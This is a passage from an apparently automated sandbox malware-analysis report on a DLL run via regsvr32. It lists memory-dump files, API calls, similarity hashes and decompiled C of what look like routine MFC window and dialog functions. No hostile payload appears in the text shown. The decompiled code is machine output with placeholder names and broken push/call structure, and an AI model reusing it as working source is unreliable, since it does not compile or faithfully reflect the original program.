                                                                                                        APIs
                                                                                                        • GetWindowLongA.USER32 ref: 1000C190
                                                                                                        • GetParent.USER32(100014EC), ref: 1000C19E
                                                                                                        • GetParent.USER32(100014EC), ref: 1000C1B1
                                                                                                        • GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
                                                                                                        • IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
                                                                                                        • EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                        • String ID:
                                                                                                        • API String ID: 670545878-0
                                                                                                        • Opcode ID: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
                                                                                                        • Instruction ID: b03ffd99d979528eb1576ebd7f6c5d6629826c0934e428a14188cd3025a76a69
                                                                                                        • Opcode Fuzzy Hash: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
                                                                                                        • Instruction Fuzzy Hash: CC11A33264533A57F221DB698C80F9A72ECDF4BAD0F260129FC44E329ADB60DC0242D5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 38%
                                                                                                        			E1001411A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                                                                        				struct tagRECT _v20;
                                                                                                        				struct HWND__* _t12;
                                                                                                        				struct HWND__* _t21;
                                                                                                        
                                                                                                        				ClientToScreen(_a4,  &_a8);
                                                                                                        				_push(5);
                                                                                                        				_push(_a4);
                                                                                                        				while(1) {
                                                                                                        					_t12 = GetWindow();
                                                                                                        					_t21 = _t12;
                                                                                                        					if(_t21 == 0) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                                                                        						GetWindowRect(_t21,  &_v20);
                                                                                                        						_push(_a12);
                                                                                                        						if(PtInRect( &_v20, _a8) != 0) {
                                                                                                        							return _t21;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_push(2);
                                                                                                        					_push(_t21);
                                                                                                        				}
                                                                                                        				return _t12;
                                                                                                        			}






                                                                                                        0x10014129
                                                                                                        0x10014135
                                                                                                        0x10014137
                                                                                                        0x1001417a
                                                                                                        0x1001417a
                                                                                                        0x1001417c
                                                                                                        0x10014180
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014146
                                                                                                        0x1001415d
                                                                                                        0x10014163
                                                                                                        0x10014175
                                                                                                        0x00000000
                                                                                                        0x10014188
                                                                                                        0x10014175
                                                                                                        0x10014177
                                                                                                        0x10014179
                                                                                                        0x10014179
                                                                                                        0x10014185

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1315500227-0
                                                                                                        • Opcode ID: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
                                                                                                        • Instruction ID: 106842abd73dbf2249684b53af78e8d9c6ae05809ec90903e9ae8d6f26667822
                                                                                                        • Opcode Fuzzy Hash: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
                                                                                                        • Instruction Fuzzy Hash: AA014F36500126BBDB12DF658C48EDE77ACEF15791F124114F911AA1A0DB30DA82CA94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E10012406(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				char* _v20;
                                                                                                        				signed int _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v40;
                                                                                                        				intOrPtr _v52;
                                                                                                        				signed int _v56;
                                                                                                        				void* __ebp;
                                                                                                        				intOrPtr _t122;
                                                                                                        				void* _t128;
                                                                                                        				intOrPtr _t130;
                                                                                                        				signed int _t139;
                                                                                                        				signed int _t144;
                                                                                                        				signed int _t175;
                                                                                                        				signed int _t177;
                                                                                                        				signed int _t179;
                                                                                                        				signed int _t181;
                                                                                                        				signed int _t183;
                                                                                                        				signed int _t187;
                                                                                                        				void* _t190;
                                                                                                        				intOrPtr _t191;
                                                                                                        				signed int _t201;
                                                                                                        
                                                                                                        				_t190 = __ecx;
                                                                                                        				_t122 = E1000D5EC(__ebx, __edi, __esi, __eflags);
                                                                                                        				_v8 = _t122;
                                                                                                        				_t3 =  &_a4;
                                                                                                        				 *_t3 = _a4 &  !( *(_t122 + 0x18));
                                                                                                        				if( *_t3 == 0) {
                                                                                                        					return 1;
                                                                                                        				}
                                                                                                        				_push(__ebx);
                                                                                                        				_push(__esi);
                                                                                                        				_push(__edi);
                                                                                                        				_t201 = 0;
                                                                                                        				E100174D0(0,  &_v56, 0, 0x28);
                                                                                                        				_v52 = DefWindowProcA;
                                                                                                        				_t128 = E1000D5EC(__ebx, 0, 0, __eflags);
                                                                                                        				__eflags = _a4 & 0x00000001;
                                                                                                        				_v40 =  *((intOrPtr*)(_t128 + 8));
                                                                                                        				_t130 =  *0x1005aa70; // 0x10003
                                                                                                        				_t187 = 8;
                                                                                                        				_v32 = _t130;
                                                                                                        				_v16 = _t187;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_push( &_v56);
                                                                                                        					_v56 = 0xb;
                                                                                                        					_v20 = "AfxWnd80s";
                                                                                                        					_t183 = E10012222(_t187, _t190, 0, 0, __eflags);
                                                                                                        					__eflags = _t183;
                                                                                                        					if(_t183 != 0) {
                                                                                                        						_t201 = 1;
                                                                                                        						__eflags = 1;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000020;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v56 = _v56 | 0x0000008b;
                                                                                                        					_push( &_v56);
                                                                                                        					_v20 = "AfxOleControl80s";
                                                                                                        					_t181 = E10012222(_t187, _t190, 0, _t201, __eflags);
                                                                                                        					__eflags = _t181;
                                                                                                        					if(_t181 != 0) {
                                                                                                        						_t201 = _t201 | 0x00000020;
                                                                                                        						__eflags = _t201;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000002;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_push( &_v56);
                                                                                                        					_v56 = 0;
                                                                                                        					_v20 = "AfxControlBar80s";
                                                                                                        					_v28 = 0x10;
                                                                                                        					_t179 = E10012222(_t187, _t190, 0, _t201, __eflags);
                                                                                                        					__eflags = _t179;
                                                                                                        					if(_t179 != 0) {
                                                                                                        						_t201 = _t201 | 0x00000002;
                                                                                                        						__eflags = _t201;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000004;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v56 = _t187;
                                                                                                        					_v28 = 0;
                                                                                                        					_t177 = E100123C5(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
                                                                                                        					__eflags = _t177;
                                                                                                        					if(_t177 != 0) {
                                                                                                        						_t201 = _t201 | 0x00000004;
                                                                                                        						__eflags = _t201;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & _t187;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v56 = 0xb;
                                                                                                        					_v28 = 6;
                                                                                                        					_t175 = E100123C5(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
                                                                                                        					__eflags = _t175;
                                                                                                        					if(_t175 != 0) {
                                                                                                        						_t201 = _t201 | _t187;
                                                                                                        						__eflags = _t201;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000010;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0xff;
                                                                                                        					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
                                                                                                        					_t48 =  &_a4;
                                                                                                        					 *_t48 = _a4 & 0xffffc03f;
                                                                                                        					__eflags =  *_t48;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000040;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x10;
                                                                                                        					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000080;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 2;
                                                                                                        					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000100;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = _t187;
                                                                                                        					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000200;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x20;
                                                                                                        					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000400;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 1;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000800;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x40;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00001000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 4;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00002000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x80;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00004000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x800;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00008000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x400;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00010000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x200;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00020000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x100;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00040000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x8000;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				_t191 = _v8;
                                                                                                        				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
                                                                                                        				_t139 =  *(_t191 + 0x18);
                                                                                                        				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
                                                                                                        				if((_t139 & 0x00003fc0) == 0x3fc0) {
                                                                                                        					 *(_t191 + 0x18) = _t139 | 0x00000010;
                                                                                                        					_t201 = _t201 | 0x00000010;
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				asm("sbb eax, eax");
                                                                                                        				_t144 =  ~((_t201 & _a4) - _a4) + 1;
                                                                                                        				__eflags = _t144;
                                                                                                        				return _t144;
                                                                                                        			}



























                                                                                                        0x10012406
                                                                                                        0x1001240c
                                                                                                        0x10012411
                                                                                                        0x10012419
                                                                                                        0x10012419
                                                                                                        0x1001241c
                                                                                                        0x00000000
                                                                                                        0x10012420
                                                                                                        0x10012426
                                                                                                        0x10012427
                                                                                                        0x10012428
                                                                                                        0x10012432
                                                                                                        0x10012434
                                                                                                        0x10012441
                                                                                                        0x10012444
                                                                                                        0x10012449
                                                                                                        0x10012452
                                                                                                        0x10012455
                                                                                                        0x1001245a
                                                                                                        0x1001245b
                                                                                                        0x1001245e
                                                                                                        0x10012461
                                                                                                        0x10012466
                                                                                                        0x10012467
                                                                                                        0x1001246e
                                                                                                        0x10012475
                                                                                                        0x1001247a
                                                                                                        0x1001247c
                                                                                                        0x1001247e
                                                                                                        0x1001247e
                                                                                                        0x1001247e
                                                                                                        0x1001247c
                                                                                                        0x1001247f
                                                                                                        0x10012483
                                                                                                        0x10012485
                                                                                                        0x1001248f
                                                                                                        0x10012490
                                                                                                        0x10012497
                                                                                                        0x1001249c
                                                                                                        0x1001249e
                                                                                                        0x100124a0
                                                                                                        0x100124a0
                                                                                                        0x100124a0
                                                                                                        0x1001249e
                                                                                                        0x100124a3
                                                                                                        0x100124a7
                                                                                                        0x100124ac
                                                                                                        0x100124ad
                                                                                                        0x100124b0
                                                                                                        0x100124b7
                                                                                                        0x100124be
                                                                                                        0x100124c3
                                                                                                        0x100124c5
                                                                                                        0x100124c7
                                                                                                        0x100124c7
                                                                                                        0x100124c7
                                                                                                        0x100124c5
                                                                                                        0x100124ca
                                                                                                        0x100124ce
                                                                                                        0x100124de
                                                                                                        0x100124e1
                                                                                                        0x100124e4
                                                                                                        0x100124e9
                                                                                                        0x100124eb
                                                                                                        0x100124ed
                                                                                                        0x100124ed
                                                                                                        0x100124ed
                                                                                                        0x100124eb
                                                                                                        0x100124f0
                                                                                                        0x100124f3
                                                                                                        0x10012503
                                                                                                        0x1001250a
                                                                                                        0x10012511
                                                                                                        0x10012516
                                                                                                        0x10012518
                                                                                                        0x1001251a
                                                                                                        0x1001251a
                                                                                                        0x1001251a
                                                                                                        0x10012518
                                                                                                        0x1001251c
                                                                                                        0x10012520
                                                                                                        0x1001252b
                                                                                                        0x10012537
                                                                                                        0x10012539
                                                                                                        0x10012539
                                                                                                        0x10012539
                                                                                                        0x10012539
                                                                                                        0x10012540
                                                                                                        0x10012544
                                                                                                        0x1001254c
                                                                                                        0x10012558
                                                                                                        0x10012558
                                                                                                        0x10012558
                                                                                                        0x1001255a
                                                                                                        0x1001255e
                                                                                                        0x10012569
                                                                                                        0x10012575
                                                                                                        0x10012575
                                                                                                        0x10012575
                                                                                                        0x1001257c
                                                                                                        0x1001257f
                                                                                                        0x10012586
                                                                                                        0x1001258e
                                                                                                        0x1001258e
                                                                                                        0x1001258e
                                                                                                        0x10012595
                                                                                                        0x10012598
                                                                                                        0x1001259f
                                                                                                        0x100125ab
                                                                                                        0x100125ab
                                                                                                        0x100125ab
                                                                                                        0x100125b2
                                                                                                        0x100125b5
                                                                                                        0x100125bc
                                                                                                        0x100125c8
                                                                                                        0x100125c8
                                                                                                        0x100125c8
                                                                                                        0x100125cf
                                                                                                        0x100125d2
                                                                                                        0x100125d9
                                                                                                        0x100125e5
                                                                                                        0x100125e5
                                                                                                        0x100125e5
                                                                                                        0x100125ec
                                                                                                        0x100125ef
                                                                                                        0x100125f6
                                                                                                        0x10012602
                                                                                                        0x10012602
                                                                                                        0x10012602
                                                                                                        0x10012609
                                                                                                        0x1001260c
                                                                                                        0x10012613
                                                                                                        0x1001261f
                                                                                                        0x1001261f
                                                                                                        0x1001261f
                                                                                                        0x10012626
                                                                                                        0x10012629
                                                                                                        0x10012630
                                                                                                        0x10012638
                                                                                                        0x10012638
                                                                                                        0x10012638
                                                                                                        0x1001263f
                                                                                                        0x10012642
                                                                                                        0x10012649
                                                                                                        0x10012651
                                                                                                        0x10012651
                                                                                                        0x10012651
                                                                                                        0x10012658
                                                                                                        0x1001265b
                                                                                                        0x10012662
                                                                                                        0x1001266e
                                                                                                        0x1001266e
                                                                                                        0x1001266e
                                                                                                        0x10012675
                                                                                                        0x10012678
                                                                                                        0x1001267f
                                                                                                        0x1001268b
                                                                                                        0x1001268b
                                                                                                        0x1001268b
                                                                                                        0x10012692
                                                                                                        0x10012695
                                                                                                        0x1001269c
                                                                                                        0x100126a4
                                                                                                        0x100126a4
                                                                                                        0x100126a4
                                                                                                        0x100126a6
                                                                                                        0x100126a9
                                                                                                        0x100126ac
                                                                                                        0x100126b8
                                                                                                        0x100126ba
                                                                                                        0x100126bf
                                                                                                        0x100126c2
                                                                                                        0x100126c2
                                                                                                        0x100126c2
                                                                                                        0x100126d1
                                                                                                        0x100126d3
                                                                                                        0x100126d3
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                        • API String ID: 2102423945-4122032997
                                                                                                        • Opcode ID: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
                                                                                                        • Instruction ID: 475a3f3acc0ffbf0912b6f4f501dab117ae518df3bc7e116c44220daacf7d2ae
                                                                                                        • Opcode Fuzzy Hash: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
                                                                                                        • Instruction Fuzzy Hash: 658130B5D00259AADB41CFA4C581BDEBBF8FF08384F118165F949EA181E774DAD4CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strlen$IconLoad_memset
                                                                                                        • String ID: 127.0.0.1
                                                                                                        • API String ID: 858515944-3619153832
                                                                                                        • Opcode ID: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
                                                                                                        • Instruction ID: 391a885bd144bb184e99009df4bcd3f8a2a5cd6933164126564d3f2e09fb5126
                                                                                                        • Opcode Fuzzy Hash: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
                                                                                                        • Instruction Fuzzy Hash: 835106B4D04298DBEB14CFA4D891B9DBBB1EF44344F1081A9E50D6B386DB356E44CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 88%
                                                                                                        			E1001486F(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				short _v72;
                                                                                                        				char* _v76;
                                                                                                        				signed int _v80;
                                                                                                        				signed int* _v84;
                                                                                                        				signed int _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				void* __edi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t54;
                                                                                                        				void* _t66;
                                                                                                        				short* _t70;
                                                                                                        				signed int _t72;
                                                                                                        				signed int _t81;
                                                                                                        				signed int* _t83;
                                                                                                        				short* _t84;
                                                                                                        				void* _t91;
                                                                                                        				signed int* _t98;
                                                                                                        				signed int _t99;
                                                                                                        				void** _t100;
                                                                                                        				intOrPtr _t102;
                                                                                                        				signed int _t104;
                                                                                                        				signed int _t106;
                                                                                                        				void* _t107;
                                                                                                        
                                                                                                        				_t101 = __esi;
                                                                                                        				_t97 = __edx;
                                                                                                        				_t82 = __ebx;
                                                                                                        				_t54 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_v8 = _t54 ^ _t106;
                                                                                                        				_t100 = __ecx;
                                                                                                        				_v76 = _a4;
                                                                                                        				if(__ecx[1] != 0) {
                                                                                                        					_push(__ebx);
                                                                                                        					_push(__esi);
                                                                                                        					_t83 = GlobalLock( *__ecx);
                                                                                                        					_v84 = _t83;
                                                                                                        					_v88 = 0 | _t83[0] == 0x0000ffff;
                                                                                                        					_v80 = E100146B2(_t83);
                                                                                                        					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
                                                                                                        					_v92 = _t102;
                                                                                                        					if(_v88 == 0) {
                                                                                                        						 *_t83 =  *_t83 | 0x00000040;
                                                                                                        					} else {
                                                                                                        						_t83[3] = _t83[3] | 0x00000040;
                                                                                                        					}
                                                                                                        					if(lstrlenA(_v76) >= 0x20) {
                                                                                                        						L15:
                                                                                                        						_t66 = 0;
                                                                                                        					} else {
                                                                                                        						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
                                                                                                        						_v76 = _t97;
                                                                                                        						if(_t97 < _t102) {
                                                                                                        							goto L15;
                                                                                                        						} else {
                                                                                                        							_t70 = E100146DD(_t83);
                                                                                                        							_t91 = 0;
                                                                                                        							_t84 = _t70;
                                                                                                        							if(_v80 != 0) {
                                                                                                        								_t81 = E100169F6(_t84 + _t102);
                                                                                                        								_t97 = _v76;
                                                                                                        								_t91 = _t102 + 2 + _t81 * 2;
                                                                                                        							}
                                                                                                        							_t33 = _t97 + 3; // 0x3
                                                                                                        							_t98 = _v84;
                                                                                                        							_t36 = _t84 + 3; // 0x10002
                                                                                                        							_t72 = _t91 + _t36 & 0xfffffffc;
                                                                                                        							_t104 = _t84 + _t33 & 0xfffffffc;
                                                                                                        							_v80 = _t72;
                                                                                                        							if(_v88 == 0) {
                                                                                                        								_t99 =  *(_t98 + 8) & 0x0000ffff;
                                                                                                        							} else {
                                                                                                        								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
                                                                                                        							}
                                                                                                        							if(_v76 == _t91 || _t99 <= 0) {
                                                                                                        								L17:
                                                                                                        								 *_t84 = _a8;
                                                                                                        								_t97 =  &_v72;
                                                                                                        								E100147F2(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
                                                                                                        								_t100[1] = _t100[1] + _t104 - _v80;
                                                                                                        								GlobalUnlock( *_t100);
                                                                                                        								_t100[2] = _t100[2] & 0x00000000;
                                                                                                        								_t66 = 1;
                                                                                                        							} else {
                                                                                                        								_t97 = _t100[1];
                                                                                                        								_t95 = _t97 - _t72 + _v84;
                                                                                                        								if(_t97 - _t72 + _v84 <= _t97) {
                                                                                                        									E100147F2(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
                                                                                                        									_t107 = _t107 + 0x10;
                                                                                                        									goto L17;
                                                                                                        								} else {
                                                                                                        									goto L15;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_pop(_t101);
                                                                                                        					_pop(_t82);
                                                                                                        				} else {
                                                                                                        					_t66 = 0;
                                                                                                        				}
                                                                                                        				return E100167D5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
                                                                                                        			}



























                                                                                                        0x1001486f
                                                                                                        0x1001486f
                                                                                                        0x1001486f
                                                                                                        0x10014875
                                                                                                        0x1001487c
                                                                                                        0x10014883
                                                                                                        0x10014889
                                                                                                        0x1001488c
                                                                                                        0x10014895
                                                                                                        0x10014896
                                                                                                        0x1001489f
                                                                                                        0x100148ad
                                                                                                        0x100148b0
                                                                                                        0x100148b8
                                                                                                        0x100148ce
                                                                                                        0x100148d0
                                                                                                        0x100148d3
                                                                                                        0x100148db
                                                                                                        0x100148d5
                                                                                                        0x100148d5
                                                                                                        0x100148d5
                                                                                                        0x100148ea
                                                                                                        0x10014968
                                                                                                        0x10014968
                                                                                                        0x100148ec
                                                                                                        0x10014901
                                                                                                        0x10014906
                                                                                                        0x10014909
                                                                                                        0x00000000
                                                                                                        0x1001490b
                                                                                                        0x1001490c
                                                                                                        0x10014912
                                                                                                        0x10014917
                                                                                                        0x10014919
                                                                                                        0x1001491f
                                                                                                        0x10014924
                                                                                                        0x10014928
                                                                                                        0x10014928
                                                                                                        0x1001492c
                                                                                                        0x10014930
                                                                                                        0x10014933
                                                                                                        0x10014937
                                                                                                        0x1001493a
                                                                                                        0x10014941
                                                                                                        0x10014944
                                                                                                        0x1001494c
                                                                                                        0x10014946
                                                                                                        0x10014946
                                                                                                        0x10014946
                                                                                                        0x10014953
                                                                                                        0x10014978
                                                                                                        0x1001497f
                                                                                                        0x10014988
                                                                                                        0x10014990
                                                                                                        0x1001499d
                                                                                                        0x100149a0
                                                                                                        0x100149a6
                                                                                                        0x100149ac
                                                                                                        0x1001495a
                                                                                                        0x1001495a
                                                                                                        0x10014961
                                                                                                        0x10014966
                                                                                                        0x10014970
                                                                                                        0x10014975
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014966
                                                                                                        0x10014953
                                                                                                        0x10014909
                                                                                                        0x100149ad
                                                                                                        0x100149ae
                                                                                                        0x1001488e
                                                                                                        0x1001488e
                                                                                                        0x1001488e
                                                                                                        0x100149bb

                                                                                                        APIs
                                                                                                        • GlobalLock.KERNEL32 ref: 10014899
                                                                                                        • lstrlenA.KERNEL32(?), ref: 100148E1
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 100148FB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
